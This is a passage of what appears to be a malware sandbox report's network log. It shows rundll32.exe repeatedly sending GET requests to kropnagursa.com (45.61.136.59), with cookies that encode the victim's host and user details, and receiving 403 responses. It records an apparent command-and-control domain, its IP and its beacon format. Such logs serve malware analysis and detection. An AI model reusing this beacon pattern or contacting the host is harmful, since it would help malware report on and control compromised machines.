                                                                                                                                            Feb 2, 2023 21:18:50.093725920 CET2342OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:50.261281967 CET2342INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            184192.168.2.44988045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:50.582781076 CET2343OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:50.750755072 CET2344INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            185192.168.2.44988145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:51.057986975 CET2344OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:51.222938061 CET2345INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            186192.168.2.44988245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:51.532366037 CET2346OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:51.697341919 CET2346INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            187192.168.2.44988345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:52.014867067 CET2347OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:52.189781904 CET2347INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:52 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            188192.168.2.44988445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:52.522339106 CET2348OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:52.696640968 CET2349INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:52 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            189192.168.2.44988545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:53.852575064 CET2350OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:54.017240047 CET2350INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            19192.168.2.44971545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:10.611542940 CET2132OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:10.776200056 CET2132INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:10 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            190192.168.2.44988645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:54.375169992 CET2351OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:54.543515921 CET2351INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            191192.168.2.44988745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:54.871228933 CET2352OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:55.035865068 CET2352INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            192192.168.2.44988845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:55.343574047 CET2353OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:55.511746883 CET2354INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:55 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            193192.168.2.44988945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:56.351459026 CET2355OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:56.518845081 CET2355INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:56 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            194192.168.2.44989045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:56.882352114 CET2356OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:57.056150913 CET2356INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:56 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            195192.168.2.44989145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:57.726495028 CET2357OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:57.891403913 CET2358INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:57 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            196192.168.2.44989245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:58.463469982 CET2358OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:58.628267050 CET2359INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            197192.168.2.44989345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:58.944261074 CET2360OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:59.108856916 CET2360INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
